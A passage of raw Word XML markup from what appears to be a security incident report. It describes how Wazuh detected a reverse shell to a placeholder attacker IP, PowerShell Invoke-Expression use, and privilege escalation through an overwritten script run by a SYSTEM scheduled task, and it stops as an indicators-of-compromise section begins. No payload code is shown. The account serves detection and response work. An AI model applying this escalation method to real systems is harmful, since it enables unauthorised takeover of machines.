      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>at the moment</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> it was executed by the SYSTEM account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569BB349" w14:textId="77777777" w:rsidR="005E069F" w:rsidRDefault="005E069F" w:rsidP="005E069F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>File Integrity Monitoring (FIM):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Wazuh agent was specifically configured to monitor C:\TaskScripts\. This provided an early-warning signal the moment the script was overwritten, prior to the task </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>actually running</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D6B309" w14:textId="77777777" w:rsidR="00533D16" w:rsidRPr="005E069F" w:rsidRDefault="00533D16" w:rsidP="00533D16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB8CFA8" w14:textId="3211E363" w:rsidR="00C572EA" w:rsidRDefault="00533D16" w:rsidP="00533D16">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="734D0921" wp14:editId="508CC281">
            <wp:extent cx="5836920" cy="1156970"/>
            <wp:effectExtent l="76200" t="76200" r="125730" b="138430"/>
            <wp:docPr id="1092200983" name="Picture 6" descr="A close-up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00983" name="Picture 6" descr="A close-up of a computer screen  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5836920" cy="1156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6F0FA2" w14:textId="77777777" w:rsidR="00C572EA" w:rsidRPr="00C572EA" w:rsidRDefault="00C572EA" w:rsidP="00C572EA"/>
    <w:p w14:paraId="6DF448A3" w14:textId="77777777" w:rsidR="00B27CAF" w:rsidRPr="00B27CAF" w:rsidRDefault="00B27CAF" w:rsidP="00B27CAF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This incident was detected via Wazuh endpoint monitoring. The logs show three key indicators of the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F93895A" w14:textId="77777777" w:rsidR="00B27CAF" w:rsidRPr="00B27CAF" w:rsidRDefault="00B27CAF" w:rsidP="00B27CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious Script Execution: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Wazuh captured the full reverse shell payload (ScriptBlock ID: d21a34ef...). This confirmed the script was attempting a TCP connection to the attacker's IP (&lt;ATTACKER_IP&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A093083" w14:textId="6FF94D6B" w:rsidR="00B27CAF" w:rsidRPr="00B27CAF" w:rsidRDefault="00B27CAF" w:rsidP="00B27CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Abnormal Behavior (T1059.001):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system flagged high-risk PowerShell activity, specifically the use of Invoke-Expression to run code strings. These alerts were logged on Feb 1, 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1138AB60" w14:textId="2F2D9ED4" w:rsidR="006F14CD" w:rsidRPr="00353AB6" w:rsidRDefault="00FF5A9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation (T1053.005): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Telemetry confirms the code was executed via a Scheduled Task running as SYSTEM, allowing the attacker to bypass standard user restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68982DF6" w14:textId="77777777" w:rsidR="00353AB6" w:rsidRDefault="00353AB6" w:rsidP="00353AB6"/>
    <w:p w14:paraId="2EF86DCA" w14:textId="4D5AC159" w:rsidR="000C051C" w:rsidRDefault="00BD0691" w:rsidP="004F3A70">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658245" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3207767A" wp14:editId="59959AEF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1506855</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1325033</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="508000" cy="177377"/>
                <wp:effectExtent l="0" t="0" r="25400" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="515722048" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="508000" cy="177377"/>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C7FFB84">
              <v:rect id="Rectangle 5" style="position:absolute;margin-left:118.65pt;margin-top:104.35pt;width:40pt;height:13.9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70ad47 [3209]" strokeweight="1pt" w14:anchorId="6E679B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GPXVTwIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+5qkK5RVpKgq6jQJ AQImno1j02iOzzu7Tbu/fmcnTRnr07QX5873+/N3ubzaNYZtFfoabMmLUc6ZshKq2r6W/PvT6tMF Zz4IWwkDVpV8rzy/mn/8cNm6mRrDGkylkFES62etK/k6BDfLMi/XqhF+BE5ZMmrARgRS8TWrULSU vTHZOM/PsxawcghSeU+3152Rz1N+rZUMd1p7FZgpOfUW0onpfIlnNr8Us1cUbl3Lvg3xD100orZU dEh1LYJgG6z/StXUEsGDDiMJTQZa11KlGWiaIn83zeNaOJVmIXC8G2Dy/y+tvN0+unskGFrnZ57E OMVOYxO/1B/bJbD2A1hqF5iky7P8Is8JUkmmYjr9PJ1GMLNjsEMfvipoWBRKjvQWCSKxvfGhcz24 xFoWVrUx8f7YSZLC3qjoYOyD0qyuqPY4JUokUUuDbCvoeYWUyobzvovkHcM0ZR0Ci1OBJhR9UO8b w1QizxCYnwr8s+IQkaqCDUNwU1vAUwmqH0Plzv8wfTdzHP8Fqv09MoSOut7JVU143ggf7gUSV+kJ aP/CHR3aQFty6CXO1oC/Tt1Hf6IQWTlrifsl9z83AhVn5pslcn0pJpO4LEmZnE3HpOBby8tbi900 SyD8C9p0J5MY/YM5iBqheaY1XcSqZBJWUu2Sy4AHZRm6naRFl2qxSG60IE6EG/voZEweUY18edo9 C3Q9qQKx8RYOeyJm77jV+cZIC4tNAF0n4h1x7fGm5UrU7X8EcXvf6snr+Lua/wYAAP//AwBQSwME FAAGAAgAAAAhANCSLZjfAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPg0AQhe8m/ofNmHgx dqEkQJClaYz1YnqwGs9bdgRSdhbZbcF/73Cyt5l5L2++V25m24sLjr5zpCBeRSCQamc6ahR8fuwe cxA+aDK6d4QKftHDprq9KXVh3ETveDmERnAI+UIraEMYCil93aLVfuUGJNa+3Wh14HVspBn1xOG2 l+soSqXVHfGHVg/43GJ9OpytgpfX+Ottztr8VO+an/12P5nsYVLq/m7ePoEIOId/Myz4jA4VMx3d mYwXvYJ1kiVs5SHKMxDsSOLlclykNAVZlfK6Q/UHAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+ AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA ACEAVBj11U8CAAD2BAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA CAAAACEA0JItmN8AAAALAQAADwAAAAAAAAAAAAAAAACpBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA AAAEAAQA8wAAALUFAAAAAA== "/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658244" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17F8A871" wp14:editId="481EAD58">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>918422</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>141393</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="508000" cy="177377"/>
                <wp:effectExtent l="0" t="0" r="25400" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="1980171053" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="508000" cy="177377"/>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473F933">
              <v:rect id="Rectangle 5" style="position:absolute;margin-left:72.3pt;margin-top:11.15pt;width:40pt;height:13.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70ad47 [3209]" strokeweight="1pt" w14:anchorId="6B10C27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GPXVTwIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+5qkK5RVpKgq6jQJ AQImno1j02iOzzu7Tbu/fmcnTRnr07QX5873+/N3ubzaNYZtFfoabMmLUc6ZshKq2r6W/PvT6tMF Zz4IWwkDVpV8rzy/mn/8cNm6mRrDGkylkFES62etK/k6BDfLMi/XqhF+BE5ZMmrARgRS8TWrULSU vTHZOM/PsxawcghSeU+3152Rz1N+rZUMd1p7FZgpOfUW0onpfIlnNr8Us1cUbl3Lvg3xD100orZU dEh1LYJgG6z/StXUEsGDDiMJTQZa11KlGWiaIn83zeNaOJVmIXC8G2Dy/y+tvN0+unskGFrnZ57E OMVOYxO/1B/bJbD2A1hqF5iky7P8Is8JUkmmYjr9PJ1GMLNjsEMfvipoWBRKjvQWCSKxvfGhcz24 xFoWVrUx8f7YSZLC3qjoYOyD0qyuqPY4JUokUUuDbCvoeYWUyobzvovkHcM0ZR0Ci1OBJhR9UO8b w1QizxCYnwr8s+IQkaqCDUNwU1vAUwmqH0Plzv8wfTdzHP8Fqv09MoSOut7JVU143ggf7gUSV+kJ aP/CHR3aQFty6CXO1oC/Tt1Hf6IQWTlrifsl9z83AhVn5pslcn0pJpO4LEmZnE3HpOBby8tbi900 SyD8C9p0J5MY/YM5iBqheaY1XcSqZBJWUu2Sy4AHZRm6naRFl2qxSG60IE6EG/voZEweUY18edo9 C3Q9qQKx8RYOeyJm77jV+cZIC4tNAF0n4h1x7fGm5UrU7X8EcXvf6snr+Lua/wYAAP//AwBQSwME FAAGAAgAAAAhAAmU90beAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJC6I pQtjm0rTaUKMC9qBgThnjWmqNU5psrW8Pd5pHH/70+/PxWr0rThhH5tAGqaTDARSFWxDtYbPj839 EkRMhqxpA6GGX4ywKq+vCpPbMNA7nnapFlxCMTcaXEpdLmWsHHoTJ6FD4t136L1JHPta2t4MXO5b qbJsLr1piC840+Gzw+qwO3oNL6/Tr7dx4ZaHalP/bNfbwS7uBq1vb8b1E4iEY7rAcNZndSjZaR+O ZKNoOc9mc0Y1KPUAggGlzoO9hsdMgSwL+f+D8g8AAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4A AADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAA IQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAA IQBUGPXVTwIAAPYEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI AAAAIQAJlPdG3gAAAAkBAAAPAAAAAAAAAAAAAAAAAKkEAABkcnMvZG93bnJldi54bWxQSwUGAAAA AAQABADzAAAAtAUAAAAA "/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658243" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07E30510" wp14:editId="774D7168">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2319655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>124460</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="508000" cy="177377"/>
                <wp:effectExtent l="0" t="0" r="25400" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="1506268138" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="508000" cy="177377"/>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84FF9A6">
              <v:rect id="Rectangle 5" style="position:absolute;margin-left:182.65pt;margin-top:9.8pt;width:40pt;height:13.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70ad47 [3209]" strokeweight="1pt" w14:anchorId="6D156EA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GPXVTwIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+5qkK5RVpKgq6jQJ AQImno1j02iOzzu7Tbu/fmcnTRnr07QX5873+/N3ubzaNYZtFfoabMmLUc6ZshKq2r6W/PvT6tMF Zz4IWwkDVpV8rzy/mn/8cNm6mRrDGkylkFES62etK/k6BDfLMi/XqhF+BE5ZMmrARgRS8TWrULSU vTHZOM/PsxawcghSeU+3152Rz1N+rZUMd1p7FZgpOfUW0onpfIlnNr8Us1cUbl3Lvg3xD100orZU dEh1LYJgG6z/StXUEsGDDiMJTQZa11KlGWiaIn83zeNaOJVmIXC8G2Dy/y+tvN0+unskGFrnZ57E OMVOYxO/1B/bJbD2A1hqF5iky7P8Is8JUkmmYjr9PJ1GMLNjsEMfvipoWBRKjvQWCSKxvfGhcz24 xFoWVrUx8f7YSZLC3qjoYOyD0qyuqPY4JUokUUuDbCvoeYWUyobzvovkHcM0ZR0Ci1OBJhR9UO8b w1QizxCYnwr8s+IQkaqCDUNwU1vAUwmqH0Plzv8wfTdzHP8Fqv09MoSOut7JVU143ggf7gUSV+kJ aP/CHR3aQFty6CXO1oC/Tt1Hf6IQWTlrifsl9z83AhVn5pslcn0pJpO4LEmZnE3HpOBby8tbi900 SyD8C9p0J5MY/YM5iBqheaY1XcSqZBJWUu2Sy4AHZRm6naRFl2qxSG60IE6EG/voZEweUY18edo9 C3Q9qQKx8RYOeyJm77jV+cZIC4tNAF0n4h1x7fGm5UrU7X8EcXvf6snr+Lua/wYAAP//AwBQSwME FAAGAAgAAAAhAM7jfA7fAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPwzAMhe9I/IfISFwQ S8e2dpSm04QYl2kHBuKcNaap1jilydby7/FOcLP9np6/V6xG14oz9qHxpGA6SUAgVd40VCv4eN/c L0GEqMno1hMq+MEAq/L6qtC58QO94Xkfa8EhFHKtwMbY5VKGyqLTYeI7JNa+fO905LWvpen1wOGu lQ9JkkqnG+IPVnf4bLE67k9Owcvr9HM7ZnZ5rDb19269G0x2Nyh1ezOun0BEHOOfGS74jA4lMx38 iUwQrYJZupixlYXHFAQb5vPL4cBDtgBZFvJ/g/IXAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+ AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA ACEAVBj11U8CAAD2BAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA CAAAACEAzuN8Dt8AAAAJAQAADwAAAAAAAAAAAAAAAACpBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA AAAEAAQA8wAAALUFAAAAAA== "/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658242" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C18D245" wp14:editId="1DA27D57">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>110067</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>120227</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="664633" cy="182033"/>
                <wp:effectExtent l="0" t="0" r="21590" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="1229997857" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="664633" cy="182033"/>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6FEB771C">
              <v:rect id="Rectangle 5" style="position:absolute;margin-left:8.65pt;margin-top:9.45pt;width:52.35pt;height:14.35pt;z-index:25165824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70ad47 [3209]" strokeweight="1pt" w14:anchorId="24D07C3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aldUAIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1vGjEQvVfqf7B8L8sSSlPEEqFEqSqh BJVUOTteG1b1etyxYaG/vmPvsqQpp6oXM/bMm4/Hm53dHGrD9gp9Bbbg+WDImbISyspuCv796f7D NWc+CFsKA1YV/Kg8v5m/fzdr3FSNYAumVMgoifXTxhV8G4KbZpmXW1ULPwCnLDk1YC0CXXGTlSga yl6bbDQcTrIGsHQIUnlPr3etk89Tfq2VDI9aexWYKTj1FtKJ6XyJZzafiekGhdtWsmtD/EMXtags Fe1T3Ykg2A6rv1LVlUTwoMNAQp2B1pVUaQaaJh++mWa9FU6lWYgc73qa/P9LKx/2a7dCoqFxfurJ jFMcNNbxl/pjh0TWsSdLHQKT9DiZjCdXV5xJcuXXoyHZlCU7gx368EVBzaJRcKT/IlEk9ksf2tBT SKxl4b4yJr6fO0lWOBoVA4z9pjSrSqo9SomSSNStQbYX9PcKKZUNk66LFB1hmrL2wPwS0IS8A3Wx EaaSeHrg8BLwz4o9IlUFG3pwXVnASwnKH33lNv40fTtzHP8FyuMKGUIrXe/kfUV8LoUPK4GkVVI1 7V94pEMbaAoOncXZFvDXpfcYTxIiL2cNab/g/udOoOLMfLUkrs/5eByXJV3GHz+N6IKvPS+vPXZX 3wLxn9OmO5nMGB/MydQI9TOt6SJWJZewkmoXXAY8XW5Du5O06FItFimMFsSJsLRrJ2PyyGrUy9Ph WaDrRBVIjQ9w2hMxfaOtNjYiLSx2AXSVhHfmteOblitJt/sQxO19fU9R58/V/DcAAAD//wMAUEsD BBQABgAIAAAAIQCGr4W03gAAAAgBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUhc UOs0oCaEOFWFKBfUA6Xi7MZLHDVeh9htwt+zPcFpNZrR7JtyNblOnHEIrScFi3kCAqn2pqVGwf5j M8tBhKjJ6M4TKvjBAKvq+qrUhfEjveN5FxvBJRQKrcDG2BdShtqi02HueyT2vvzgdGQ5NNIMeuRy 18k0SZbS6Zb4g9U9Plusj7uTU/Dyuvh8mzKbH+tN871db0eT3Y1K3d5M6ycQEaf4F4YLPqNDxUwH fyITRMc6u+ck3/wRxMVPU952UPCQLUFWpfw/oPoFAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+ AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA ACEAmvmpXVACAAD2BAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA CAAAACEAhq+FtN4AAAAIAQAADwAAAAAAAAAAAAAAAACqBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA AAAEAAQA8wAAALUFAAAAAA== "/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B3CAF32" wp14:editId="3F820C3A">
            <wp:extent cx="5836920" cy="2197735"/>
            <wp:effectExtent l="76200" t="76200" r="125730" b="126365"/>
            <wp:docPr id="574396359" name="Picture 4" descr="A screen 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96359" name="Picture 4" descr="A screen shot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5836920" cy="21977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BD713B" w14:textId="77777777" w:rsidR="00F8290C" w:rsidRDefault="00F8290C" w:rsidP="000C051C"/>
    <w:p w14:paraId="70E5320D" w14:textId="77777777" w:rsidR="00F8290C" w:rsidRDefault="00F8290C" w:rsidP="000C051C"/>
    <w:p w14:paraId="4DA53639" w14:textId="77777777" w:rsidR="00F8290C" w:rsidRDefault="00F8290C" w:rsidP="000C051C"/>
    <w:p w14:paraId="6D5DE0BF" w14:textId="77777777" w:rsidR="00353AB6" w:rsidRDefault="00353AB6" w:rsidP="000C051C"/>
    <w:p w14:paraId="7ABE0CF3" w14:textId="6D11450F" w:rsidR="000C051C" w:rsidRDefault="00E30B74" w:rsidP="000C051C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Indicators of Compromise (IoCs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5993982D" w14:textId="77777777" w:rsidR="00F8290C" w:rsidRPr="00E30B74" w:rsidRDefault="00F8290C" w:rsidP="000C051C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A325E30" w14:textId="27847467" w:rsidR="000A6181" w:rsidRDefault="002376A2" w:rsidP="000E7E9E">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Host-based IoCs (The Clues inside the Computer) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(These are changes made directly to the files on the Windows machine.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C988B7" w14:textId="33FCD051" w:rsidR="000A6181" w:rsidRPr="000A6181" w:rsidRDefault="000A6181" w:rsidP="000E7E9E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E4B974" w14:textId="77777777" w:rsidR="008847FC" w:rsidRPr="008847FC" w:rsidRDefault="008847FC" w:rsidP="008847FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
